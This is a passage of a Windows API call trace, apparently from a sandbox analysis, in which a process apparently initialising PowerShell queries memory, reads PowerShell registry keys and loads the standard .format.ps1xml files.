	[0062.337] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.339] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.354] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.355] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.355] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.363] GetLastError () returned 0xcb
	[0062.365] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.371] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.371] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.371] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.372] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.373] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.373] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.375] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.376] VirtualQuery (in: lpAddress=0xad6a4, lpBuffer=0xae6a4, dwLength=0x1c | out: lpBuffer=0xae6a4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.378] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae82c | out: phkResult=0xae82c*=0x32c) returned 0x0
	[0062.378] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xae894, lpData=0x0, lpcbData=0xae890*=0x0 | out: lpType=0xae894*=0x1, lpData=0x0, lpcbData=0xae890*=0x74) returned 0x0
	[0062.378] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xae874, lpData=0x0, lpcbData=0xae870*=0x0 | out: lpType=0xae874*=0x1, lpData=0x0, lpcbData=0xae870*=0x74) returned 0x0
	[0062.378] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0xae874, lpData=0x242ad0, lpcbData=0xae870*=0x74 | out: lpType=0xae874*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xae870*=0x74) returned 0x0
	[0062.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xae3f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0062.379] GetLastError () returned 0xcb
	[0062.379] SetErrorMode (uMode=0x1) returned 0x1
	[0062.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xae874 | out: lpFileInformation=0xae874*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0062.379] GetLastError () returned 0xcb
	[0062.379] SetErrorMode (uMode=0x1) returned 0x1
	[0062.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.379] GetLastError () returned 0xcb
	[0062.379] SetErrorMode (uMode=0x1) returned 0x1
	[0062.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae868 | out: lpFileInformation=0xae868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0062.379] GetLastError () returned 0xcb
	[0062.379] SetErrorMode (uMode=0x1) returned 0x1
	[0062.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0062.380] GetLastError () returned 0xcb
	[0062.380] SetErrorMode (uMode=0x1) returned 0x1
	[0062.380] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae868 | out: lpFileInformation=0xae868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0062.380] GetLastError () returned 0xcb
	[0062.380] SetErrorMode (uMode=0x1) returned 0x1
	[0062.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.380] GetLastError () returned 0xcb
	[0062.380] SetErrorMode (uMode=0x1) returned 0x1
	[0062.380] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae868 | out: lpFileInformation=0xae868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0062.380] GetLastError () returned 0xcb
	[0062.380] SetErrorMode (uMode=0x1) returned 0x1
	[0062.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.380] GetLastError () returned 0xcb
	[0062.380] SetErrorMode (uMode=0x1) returned 0x1
	[0062.380] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae868 | out: lpFileInformation=0xae868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0062.380] GetLastError () returned 0xcb
	[0062.381] SetErrorMode (uMode=0x1) returned 0x1
	[0062.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0062.381] GetLastError () returned 0xcb
	[0062.381] SetErrorMode (uMode=0x1) returned 0x1
	[0062.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae868 | out: lpFileInformation=0xae868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0062.381] GetLastError () returned 0xcb
	[0062.381] SetErrorMode (uMode=0x1) returned 0x1
	[0062.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0062.381] GetLastError () returned 0xcb
	[0062.381] SetErrorMode (uMode=0x1) returned 0x1
	[0062.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae868 | out: lpFileInformation=0xae868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0062.381] GetLastError () returned 0xcb
	[0062.381] SetErrorMode (uMode=0x1) returned 0x1
	[0062.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0062.381] GetLastError () returned 0xcb
	[0062.381] SetErrorMode (uMode=0x1) returned 0x1
	[0062.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae868 | out: lpFileInformation=0xae868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0062.382] GetLastError () returned 0xcb
	[0062.382] SetErrorMode (uMode=0x1) returned 0x1
	[0062.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0062.382] GetLastError () returned 0xcb
	[0062.382] SetErrorMode (uMode=0x1) returned 0x1
	[0062.382] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae868 | out: lpFileInformation=0xae868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0062.382] GetLastError () returned 0xcb
	[0062.382] SetErrorMode (uMode=0x1) returned 0x1
	[0062.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0062.382] GetLastError () returned 0xcb
	[0062.382] SetErrorMode (uMode=0x1) returned 0x1
	[0062.382] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae868 | out: lpFileInformation=0xae868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0062.382] GetLastError () returned 0xcb
	[0062.382] SetErrorMode (uMode=0x1) returned 0x1
	[0062.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.383] GetLastError () returned 0xcb
	[0062.391] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.391] GetLastError () returned 0xcb
	[0062.392] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.392] GetLastError () returned 0xcb
	[0062.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0062.393] GetLastError () returned 0xcb
	[0062.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae17c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.394] GetLastError () returned 0xcb
	[0062.394] SetErrorMode (uMode=0x1) returned 0x1
	[0062.394] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0062.394] GetLastError () returned 0x0
	[0062.394] GetFileType (hFile=0x2fc) returned 0x1
	[0062.395] SetErrorMode (uMode=0x1) returned 0x1
	[0062.395] GetFileType (hFile=0x2fc) returned 0x1
	[0062.395] ReadFile (in: hFile=0x2fc, lpBuffer=0x227e634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x227e634*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.396] GetLastError () returned 0x0
	[0062.397] ReadFile (in: hFile=0x2fc, lpBuffer=0x227e634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x227e634*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.397] GetLastError () returned 0x0
	[0062.397] ReadFile (in: hFile=0x2fc, lpBuffer=0x227e634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x227e634*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.398] GetLastError () returned 0x0
	[0062.398] ReadFile (in: hFile=0x2fc, lpBuffer=0x227e634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x227e634*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.398] GetLastError () returned 0x0
	[0062.398] ReadFile (in: hFile=0x2fc, lpBuffer=0x227e634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x227e634*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.398] GetLastError () returned 0x0
	[0062.398] ReadFile (in: hFile=0x2fc, lpBuffer=0x227e634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x227e634*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.399] GetLastError () returned 0x0
	[0062.399] ReadFile (in: hFile=0x2fc, lpBuffer=0x227e634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x227e634*, lpNumberOfBytesRead=0xae6e4*=0x9e2, lpOverlapped=0x0) returned 1
	[0062.399] GetLastError () returned 0x0
	[0062.399] ReadFile (in: hFile=0x2fc, lpBuffer=0x227dbb6, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x227dbb6*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.399] GetLastError () returned 0x0
	[0062.399] ReadFile (in: hFile=0x2fc, lpBuffer=0x227e634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x227e634*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.399] GetLastError () returned 0x0
	[0062.399] CloseHandle (hObject=0x2fc) returned 1
	[0062.399] GetLastError () returned 0x0
	[0062.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.399] GetLastError () returned 0x0
	[0062.399] SetErrorMode (uMode=0x1) returned 0x1
	[0062.399] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x228f6f0 | out: lpFileInformation=0x228f6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0062.400] GetLastError () returned 0x0
	[0062.400] SetErrorMode (uMode=0x1) returned 0x1
	[0062.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.400] GetLastError () returned 0x0
	[0062.400] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae668 | out: phkResult=0xae668*=0x2fc) returned 0x0
	[0062.400] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x0, lpcbData=0xae6ac*=0x0 | out: lpType=0xae6b0*=0x1, lpData=0x0, lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.400] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x242ad0, lpcbData=0xae6ac*=0x56 | out: lpType=0xae6b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.400] RegCloseKey (hKey=0x2fc) returned 0x0
	[0062.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.401] GetLastError () returned 0x0
	[0062.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.401] GetLastError () returned 0x0
	[0062.409] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x4b095133, Data2=0xd817, Data3=0x4203, Data4=([0]=0x8e, [1]=0xff, [2]=0x83, [3]=0xa9, [4]=0x6b, [5]=0xc8, [6]=0x28, [7]=0xad))) returned 0x0
	[0062.422] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xbd661664, Data2=0xe2ef, Data3=0x4e63, Data4=([0]=0xa9, [1]=0xe5, [2]=0xed, [3]=0x1d, [4]=0xc8, [5]=0x35, [6]=0xb, [7]=0x7a))) returned 0x0
	[0062.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae17c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0062.422] GetLastError () returned 0x0
	[0062.423] SetErrorMode (uMode=0x1) returned 0x1
	[0062.423] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0062.423] GetLastError () returned 0x0
	[0062.423] GetFileType (hFile=0x2fc) returned 0x1
	[0062.423] SetErrorMode (uMode=0x1) returned 0x1
	[0062.423] GetFileType (hFile=0x2fc) returned 0x1
	[0062.424] ReadFile (in: hFile=0x2fc, lpBuffer=0x22a29d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22a29d8*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.425] GetLastError () returned 0x0
	[0062.425] ReadFile (in: hFile=0x2fc, lpBuffer=0x22a29d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22a29d8*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.425] GetLastError () returned 0x0
	[0062.426] ReadFile (in: hFile=0x2fc, lpBuffer=0x22a29d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22a29d8*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.426] GetLastError () returned 0x0
	[0062.427] ReadFile (in: hFile=0x2fc, lpBuffer=0x22a29d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x22a29d8*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.427] GetLastError () returned 0x0
